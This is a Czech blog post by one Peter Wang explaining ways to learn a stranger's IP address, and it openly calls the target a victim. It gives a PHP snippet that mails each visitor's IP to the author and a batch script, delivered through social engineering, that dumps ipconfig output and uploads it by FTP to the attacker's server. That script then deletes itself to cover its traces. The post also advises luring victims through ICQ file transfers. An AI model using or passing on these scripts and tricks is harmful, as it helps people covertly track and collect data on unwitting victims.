Několik způsobů jak zjistit IP adresu cizího počítače.

.. tuto otázku mi po ICQ už položilo mnoho lidí. Sice nevím, co tak těžkého na tom, zeptat se Googlu, ale rozhodl jsem se, že zde popíši některé z možných způsobů. Těch jsou samozřejmě desítky, viz Google.

Pomocí PHP skriptu

Nutné je, abyste měli svůj webový prostor, kam můžete uploadovat soubory. Vytvořte si v HTML jakýkoliv soubor, můžete použít i existující a vložte do něj následujíci kód:
(adresu [email protected] samozřejmě nahraďte svou vlastní:-P)

<? mail("[email protected]", "IP adresa", $REMOTE_ADDR) ?>

Pozor! Teď je nutné ještě změnit příponu souboru na *.php (napr kouknisem.php), jinak by PHP skript nefungoval. Stránku uploadujte na server a teď už jen stačí oběť donutit, aby si ji ve svém prohlížeči zobrazila. Jakmile máte jistotu, že obět vaši stránku navštívila ,podívejte do příchozích mailů a uvidíte, že nově přijatý mail obsahuje IP adresu oběti.

Pomocí cmd/bat skriptu

Nejdříve si vysvětlíme princip totoho zůsobu. Napíšete jednoduchý skript (bude mít příponu .cmd nebo .bat – tzv. dávkový soubor) a ten odešlete oběti. Jakmile na něj oběť klikne, na vaše FTP se uploaduje soubor obsahující výpis z programu ipconfig oběti, ve kterém vyčtete (nejenom) její IP adresu. Nevýhodou tohoto způsobu je to, že obět musí skript spustit, je tedy nutné (pokud tedy oběť není absolutní PC analfabet) použít sociotechniku. Největší nevýhoda však je, že pokud si oběť skript otevře například v Poznámkovém bloku, lehce vyčte vaše username a heslo k FTP, proto použijte raději FTP vytvořené pouze k tomutu účelu a jehož případně prozrazení by pro vás nebylo příliš bolestivé.

Skript by mohl vypadat nějak takto:

ipconfig >"%username%.txt"

echo open ic.cz>"ftp.txt"
echo username>>"ftp.txt"
echo heslo>>"ftp.txt"
echo put "%username%.txt">>"ftp.txt"
echo quit>>"ftp.txt"

ftp -s:"ftp.txt"

del "ftp.txt"
del "%username%.txt"
del "skript.cmd"

K jeho vytvoření vám stačí obyčejný Poznámkový blok s tím, že příponu .txt následně změníte na .cmd či .bat. První řádek převede výstup programu ipconfig do souboru, který bude mít stejné jméno, jako je username počítače na kterém je skript spuštěn. Dále se otevře FTP spojení (za ic.cz, username a heslo si dosaďte své údaje) a soubor s IP adresami se uploaduje na váš server. Nakonec se smaže pomocný soubor ftp.txt, soubor s IP a také samotný skript. Nyní se stačí pouze podívat na vaše FTP a měli byste zde nalézt onen očekávaný soubor.

Pomocí Firewalu

Jestliže si s obětí píšete po ICQ, můžete jí nabídnout, že jí pošlete určitý soubor (socitechnika). Je jedno, o jaký soubor se jedná, měl by být však tak velký, aby odesílání trvalo dostatečně dlouhou dobu a ne jen několik vteřin. Pokud obět soubor přijme, začne ho od vás stahovat. Nyní se podívejte do vašeho firewallu na odchozí spojení a měli byste vidět proces například icq.exe a u něho vzdálenou IP adresu, na kterou se data odesílají. A to je přesně ta IP adresa, kterou hledáte.

Pokud se chcete dovědět i další způsoby, jak zjistit něčí IP adresu, tak nebuďte líní a naučte se používat Google:)

Toť vše…

Související příspěvky

Peter Wang